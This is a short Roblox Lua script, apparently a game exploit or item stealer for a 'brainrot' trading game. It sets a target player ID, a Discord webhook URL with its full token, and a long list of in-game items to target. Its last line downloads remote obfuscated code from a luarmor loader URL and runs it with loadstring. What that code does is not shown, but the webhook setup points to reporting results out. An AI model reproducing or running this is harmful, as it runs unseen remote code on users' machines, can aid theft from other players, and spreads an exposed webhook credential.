getgenv().TARGET_ID = 9343962304
getgenv().SELECT_DELAY = 1
getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1478444906283536488/ljR25l3ERJTrlHWWg0x4qteUJgBo0_c1ZGkIMhb5QTNS66FPFKbwsUK-u015gf7VKdTa"
getgenv().TARGET_BRAINROTS = {
    ["Headless Horseman"] = true,
    ["Strawberry Elephant"] = true,
    ["Bacuru and Egguru"] = true,
    ["Brunito Marsito"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Celestial Pegasus"] = true,
    ["Cerberus"] = true,
    ["Celularcini Viciosini"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Chillin Chili"] = true,
    ["Chimnino"] = true,
    ["Chipso and Queso"] = true,
    ["Cooki and Milki"] = true,
    ["Crocodildo Penisini"] = true,
    ["Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Esok Sekolah"] = true,
    ["Eviledon"] = true,
    ["Festive 67"] = true,
    ["Festive Lucky Block"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Garama and Madundung"] = true,
    ["Ginger Gerat"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Gold Elf"] = true,
    ["Guest 666"] = true,
    ["Heart Lucky Block"] = true,
    ["Horegini Boom"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Ice Dragon"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Ketupat Bros"] = true,
    ["Ketupat Kepat"] = true,
    ["La Casa Boo"] = true,
    ["La Extinct Grande"] = true,
    ["La Food Combinasion"] = true,
    ["La Ginger Sekolah"] = true,
    ["La Grande Combinasion"] = true,
    ["La Jolly Grande"] = true,
    ["La Romantic Grande"] = true,
    ["La Sahur Combinasion"] = true,
    ["La Secret Combinasion"] = true,
    ["La Spooky Grande"] = true,
    ["La Supreme Combinasion"] = true,
    ["La Taco Combinasion"] = true,
    ["Las Sis"] = true,
    ["Lavadorito Spinito"] = true,
    ["Los 67"] = true,
    ["Los Amigos"] = true,
    ["Los Bros"] = true,
    ["Los Candies"] = true,
    ["Los Combinasionas"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Los Mobilis"] = true,
    ["Los Nooo My Hotspotsitos"] = true,
    ["Los Planitos"] = true,
    ["Los Primos"] = true,
    ["Los Puggies"] = true,
    ["Los Sekolahs"] = true,
    ["Los Spaghettis"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Los Sweethearts"] = true,
    ["Los Tacoritas"] = true,
    ["Love Love Bear"] = true,
    ["Lovin Rose"] = true,
    ["Mariachi Corazoni"] = true,
    ["Money Money Puggy"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["Meowl"] = true,
    ["Money Money Reindeer"] = true,
    ["Naughty Naughty"] = true,
    ["Noo my Candy"] = true,
    ["Noo my Heart"] = true,
    ["Noo my Present"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Orcaledon"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Pot Hotspot"] = true,
    ["Rang Ring Bus"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Reinito Sleighito"] = true,
    ["Rosetti Tualetti"] = true,
    ["Rosey and Teddy"] = true,
    ["Sammyni Fattini"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Spooky and Pumpky"] = true,
    ["Swag Soda"] = true,
    ["Spinny Hammy"] = true,
    ["Swaggy Bros"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Tang Tang Keletang"] = true,
    ["Tictac Sahur"] = true,
    ["Tirilikalika Tirilikalako"] = true,
    ["Tralaledon"] = true,
    ["Tuff Toucan"] = true,
    ["Ventoliero Pavonero"] = true,
    ["W or L"] = true,
    ["Skibidi Toilet"] = true,
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/807805cafcedc748b9439e61aa8c364c.lua"))()
